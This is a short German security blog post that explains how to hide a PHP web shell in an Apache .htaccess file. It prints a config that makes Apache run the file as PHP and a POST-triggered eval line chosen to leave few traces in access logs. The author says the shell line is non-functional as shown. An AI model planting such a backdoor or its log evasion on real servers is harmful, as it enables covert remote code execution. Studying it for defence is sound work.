BotNetzProvider.de Ein Security Blog über Honig-Töpfe (honeypots) , Bots und Bitcoin

1Jun/110

PHP-Shell in .htaccess Datei

Vor kurzem habe ich einen Artikel von Eldar Marcussen gelesen. Er schreibt über die Einbindung von einer PHP-Shell in eine ".htaccess" Datei. Den Ansatz den er verfolgt ist ziemlich interessant, nur leider verursacht seine PHP-Shell zu viel Lärm in der "access_logs" des Webservers.

Zunächst einmal muss man die Weiterleitungsregeln (rewrite) abändern, so dass die ".htaccess" Datei nicht ausgeführt wird und man diese als URL erreichen kann. Als nächstes bearbeiten wir die Datei so, dass der Inhalt als normaler dynamischer Inhalt wieder gegeben wird vom Webserver. Die PHP-Shell muss auskommentiert werden in der ".htaccess", damit der Apache erst die Direktive interpretiert und nicht den PHP Code. Sobald man nun die Datei im Browser aufruft, wird der PHP Code in den PHP Tags ausgeführt und man hat eine funktionierende PHP-Shell. Ich habe mich für eine PHP-Shell die man via POST aufruft entschieden, um den Lärm in den access-logs so gering wie möglich zu halten.

Beispiel .htaccess:

# Orginal von http://www.justanotherhacker.com 
# umgeschrieben von http://blog.botnetzprovider.de 

Order allow,deny
Allow from all

# Apache sagen bitte die .htaccess Datei als PHP interpretieren. 
AddType application/x-httpd-php .htaccess

# Botnetzprovider PHP-Shell
### php eval($_POST['botnetzprovider_sais']);  shell ist so nicht funktionsfähig #
/* google like button API */